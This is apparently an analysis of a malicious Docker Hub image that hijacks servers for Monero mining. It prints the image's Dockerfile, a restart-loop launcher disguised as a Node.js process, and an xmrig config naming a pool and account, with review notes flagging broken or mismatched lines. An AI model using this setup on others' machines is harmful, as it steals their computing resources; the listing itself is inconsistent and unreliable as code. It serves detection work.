Malicious image found on Docker Hub at https://hub.docker.com/r/l0se3/dah/.
I recently found a container running this image (l0se3/dah) on a server.
Dockerfile of the image:
# Dockerfile as published with the image; it builds a container around a miner
# binary and its launcher script. Treat it as a description supplied by the
# publisher: the image's own layers and history are the authoritative evidence.

# The base is referenced by the mutable tag "latest", so the exact base layers
# cannot be determined from this listing alone.
FROM phusion/baseimage:latest
LABEL maintainer=ziw
# Installs download and archive tooling (wget, xz-utils, git, curl, zip).
# NOTE(review): the package installed is zip, while a later step calls unzip;
# whether unzip already exists in the base image is not shown here. Confirm.
RUN apt-get -y update && \
DEBIAN_FRONTEND=noninteractive apt-get install -y \
wget \
xz-utils \
git \
curl \
zip && \
rm -rf /var/lib/apt/lists/
WORKDIR /tmp
# The payload is fetched from a GitHub repository at build time, with no commit
# or tag pinned, so the repository content behind a given image build is not
# fixed by this file.
RUN git clone https://github.com/l0se3x/dah.git
# NOTE(review): a clone without a target directory lands in /tmp/dah, but the
# working directory switches to /tmp/runandrun, which nothing above populates.
# The listing therefore looks incomplete or edited relative to the real build.
WORKDIR /tmp/runandrun
RUN unzip var.zip
# NOTE(review): this chmod has no file operand; the file name was presumably
# lost when the listing was published. Verify against the image layers.
RUN chmod +x
RUN chmod +x run.sh
# No CMD or ENTRYPOINT appears in this listing, so how run.sh gets started
# (image default, or a command given at `docker run`) cannot be told from here.
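Run the container for inspection. --network=none starts it without network access, so nothing inside can reach the mining pool. Note that the image name in the command below (l0s3r/m3n) differs from the one reported above (l0se3/dah).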
$ docker run -it --network=none l0s3r/m3n /bin/bash
Files in WORKDIR
config.json Dockerfile nodjs run.sh var.zip
Contents of the files
run.sh
!/bin/sh
# NOTE(review): the interpreter line above lacks its leading '#'; it was
# probably lost when the page was rendered. Compare with the file in the image.
#
# Launcher: an endless loop, so whenever ./nodjs exits it is started again with
# the same configuration. Killing the nodjs process alone does not stop the
# activity while this script is still running.
while :
do
echo "Press [CTRL+C] to stop.."
# nodjs is handed config.json via -c; the config shown on this page uses
# xmrig-style options. The file name presumably imitates a Node.js process
# (not confirmed), so identify it by content and hash rather than by name.
./nodjs -c config.json
done
config.json
// Configuration that run.sh passes to ./nodjs. The option names and the
// comments (xmrig.log example, xmrig wiki API link, xmrig-proxy) match the
// xmrig miner's config format.
// Detection-relevant values: the pool endpoint ("url") and the pool account
// ("user") under "pools", plus "max-cpu-usage": 95 (sustained high CPU load).
// "donate-level" is 0 although its own comment states a minimum of 1%, which
// suggests a modified build. Confirm against the binary.
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"background": false, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 0, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 95, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"syslog": false, // use system log for output messages
"threads": 0, // number of miner threads
"pools": [
{
"url": "xmr.pool.minergate.com:45700", // URL of mining server
"user": "sam05@protonmail.com", // username for mining server
"pass": "x", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false, // enable nicehash/xmrig-proxy support
"variant": -1 // algorithm PoW variant
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
}
}